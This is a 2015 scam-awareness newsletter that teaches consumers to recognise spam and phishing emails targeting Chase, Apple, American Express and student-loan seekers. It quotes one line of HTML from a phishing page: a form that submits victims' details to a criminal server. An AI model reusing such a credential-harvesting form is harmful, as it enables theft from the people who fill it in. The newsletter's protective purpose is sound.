Please support our effort by making a small donation. Thank you!

x

June 24, 2015

THE WEEK IN REVIEW

We hope Dads everywhere (except the scammers who are trying to scam us all) had a wonderful Father’s Day! We’re pleased to say we only found one online scam specifically targeting Father’s Day gift buying. But first here is a sampling of the week’s subject lines and email addresses. You’ll notice a lot of scams are still using the “dot-science” global top level domain. We have yet to see a legitimate use for this domain…

Sample Scam Subject lines and Email Addresses from the Past Week…

Subject Lines

Brittany Spears sprays this in her mouth daily!

Congrats from Microsoft

Distinguished Women of 2015 – you have been chosen

Get tasty healthy snacks delivered to your door!

I won’t forgive you if you don’t see this

Instantly use these points at any Walgreens

Reminder: Your credit report is ready to be viewed

Share your tablet PC reviews and photos

Summer Deals On All-Inclusive Vacations Here!

Transfer your credit card balances to one credit card

Why you should consider a start up business

YOUR ATM CARD DELIVERY NOTIFICATION FROM THE FBI!!!

Email Addresses

ADHDSymptoms@conful.science

AutoDeals-Alert@galatean.science

BankAcctOptions@seconduce.science

BeverlyHills-MD@gacers.science

CancerTreatmentResources@madistian.science

DealingwithDiabetes@naises.science

HawaiiVacationDeals@themor.eu

iMemories@genneral.work

PsychicReading@Sothercity.com

SmartPhoneRepair@airbada.science

TreatMigraines@rependen.science

TruckClearance@rimcim.science

 

 

 

 

Phish NETS: American Express, Chase Bank, Apple’s iCloud and GSX Accounts

Phishing scams jumped during the past week (which explains the need for a long column here), including this bogus Chase Bank email with the subject line “Recent suspicious activity on your online account.” You’ll notice that there is no personal information to identify the recipient of this email. And though it comes from chase@memberservice.com this isn’t chase.com. In fact, a WHOIS lookup of the domain memberservice.com shows that it is owned by a small publishing house since 1996 called Bookspan LLC.  However, the WHOIS record was modified as recently as today (6-21-15) so our guess is that scammers have control over this domain’s registration and are misusing it. By the way, that attached Validation Form.htm is a dangerous web document. We’ll show you more information about another one of these below.

The criminals also targeted Apple iCloud users again late in the week and Apple GSX users! Apple GSX is Apple’s self-servicing account for businesses/schools who do their own repairs. For some reason, these criminals love to pick on Apple. Check out these emails! The first, with subject line “update icloud settings” is a poorly designed phish. The sender’s from-address is mospan@kadraplus.pl and our reader’s know that addresses and domains ending in a dot followed by 2 letters indicate a country code. This was sent from Poland and a mouse-over of the link in the email points back to a server in Poland – twojgrecki.pl This is definitely not Apple.com.

 

The GSX email is more expertly created. It was sent from an email address that sounds official (but is still not from Apple.com) – gsx_admin@notification.com. Also, a mouse-over of the “Verify Now” link points to a very official-sounding domain gsxappleid.com. This bogus domain is an obvious attempt at fraud and was registered on June 19 with the service GoDaddy.com. Fortunately, it appears that GoDaddy’s staff realized fairly quickly that the domain was being used for fraud and shut it down. You can see that shut-down on the WHOIS record. We wish other domain-name resellers and hosting services were as responsive, such as Enom.com. Some domain name resellers routinely turn a blind eye in order to make money and don’t seem to care at all that the rest of us are put at risk.

 

The most dangerous phishing scam this past week targeted lots of American Express card holders. Each was very professionally crafted and included an attached html webpage. For example, this email below contains a spoofed email address from amex.com and the subject line “Confirm your American Express online details.” The punctuation, spelling, and grammar in the email is nearly perfect. (We see two small errors in grammar/punctuation. Can you find more?)

4-Amex phishing email

The attached webpage form named American_Express_Verification.html is very professionally crafted and contains many legitimate links to American Express. But don’t be fooled! This form pulls several unique graphics from a webserver in Portugal called jpmmotos.pt (2-letter country code is .pt). Most importantly, the code behind this scam form submits your very personal information to a server in Brazil called ecofisco.com.br! According to VirusTotal.com, ten online services have identified this Brazilian domain as malicious and phishing…

4b-Ecofisco-com-br virustotal eval

 

 

Click the thumbnail below to see what these criminals were asking victims to provide. No one should divulge this information! Check out this bit of the code that is hidden in this web document. Notice the domain and 2-letter country code in bold.

5-Amex phishing web page

<form id=”oceAccountCID” action=”http://ecofisco.com.br/images/vns/imp-update/Administrator/NatWest/update.php” autocomplete=”off” class=”jsForm” method=”post” style=”margin: 0px; padding: 0px; border: 0px;”>

 Delete. Delete. Delete.

 

 

 

YOUR MONEY: Cheap Flights, Sam’s Club and Online Subscriptions

We are so used to giving our email address to companies with whom we do business. We get offers, coupons and promotions to the point where we consider most of them to be spam. This overload makes it harder to spot scams like these three below. Each leads to a malicious website. Can you spot the flaws that should make recipients suspicious? Look carefully at all three and then check out our list of issues at the bottom of the column.

 

 

7-Sams club members

 

 

 

 

 

1. The first email for cheap flights did not lead to a hacked server with a strange-sounding name but to a domain that sounded like it could be legitimate — airlinediscounttickets.us. However, the use of .us made us a wee-bit suspicious so we Googled the domain and came up with nothing! No website, no information. Now we were really suspicious and checked it using the Zulu URL risk analyzer and BINGO!

 9-Cheap flights domain zulu score

 

2. The Sam’s Club email didn’t even come from a Sam’s Club domain and a mouse-over revealed the fraud. Also, the colored box at the bottom contained hidden random text meant to fool antispam servers. Finally, who the heck writes stuff like “You must continue with your life, all you need to do is let us know and will be all good” into a legitimate email?

3. The subscription offer to The Economist magazine came from TheEconomist@gordham.science. This address is a certain giveaway that this is a scam. Yet, the email looks so professionally done! We decided to ask the Zulu URL Risk Analyzer just in case. No question. Delete.

10-Subscribe to the Economist zulu score

 

 

 

 

TOP STORY: Federal Student Loan Forgiveness Program

It was reported to The Daily Scam that people started receiving email and website pitches for a Federal Student Loan Forgiveness Program. The first email we saw made us suspicious because it was sent from an address in the Czech Republic (.cz country code) and the body of the email used a couple of subtle tricks meant to avoid antispam servers. For example, instead of writing student loans which might be recognized and blocked, the writer entered StudentLoans. And yet, the email contained a toll-free 888 telephone number which seemed to legitimize the content. So we started digging…

 


Soon we discovered more of these Student Loan Forgiveness program emails being sent from many different email addresses such as these…

 

 

 

Now we were certain this was a scam so we Googled the toll-free number and discovered that these scammers had also entered the same information as comment spam on dozens of websites that had nothing to do with education or loans. See below the first page of Google returns. (Comment spam is unwanted comments dropped onto website comment forms and having nothing to do with the forum or blog on which they are dumped.)

 13-Federal student loans Google phone search

 

Scammers often prey upon people who can least afford it. These people may be in need of help financially, medically or even emotionally and may be desperate to try something new to alleviate the stress and pain in their lives. We feel this egregious practice is especially nasty of scammers. A pox upon them! Here are a couple of articles about various scams that target folks looking for debt and student loan relief. If you search Google for student loan forgiveness programs be careful! There are lots of scam domains being used to trap web searchers like some giant venus fly trap.

 

http://www.dailyfinance.com/2014/10/15/student-loan-forgiveness-smart-deal-or-scam/

http://www.nbcnews.com/business/personal-finance/student-loan-repayment-scams-how-avoid-being-ripped-n166781

http://www.bbb.org/washington-dc-eastern-pa/news-events/bbb-scam-alerts/2015/04/student-loan-forgiveness-dont-take-the-bait1/

FOR YOUR SAFETY: Father’s Day

Make dad smile says admin@reusete.com. “Your probably thinking it’s tool late to get dad the perfect gift?” We are especially offended by that “see ya later my friend.” Clicking this link leads to nothing but trouble. Scammers often take advantage of big holidays to push out scams. We were surprised to find only one scam email targeting people for Father’s Day. In case you had any doubts, check out the Zulu URL Risk Analyzer score below for the link “View the Ideas Here.”

15-Fathers day zulu score

 

 

 

ON THE LIGHTER SIDE: How big do you want to dream?

We dream big. Really, we do! We want to believe that millions of people will find our website and learn from it so they’ll be safer online. And we finally found help to get us there! We’re gonna sign up for this webinar to change our lives! We’re gonna put our game plan in action and call Doc and Deana! Watch out world! Here we come!

Until next week, surf safely!

16-Webinar -how big do you want to dream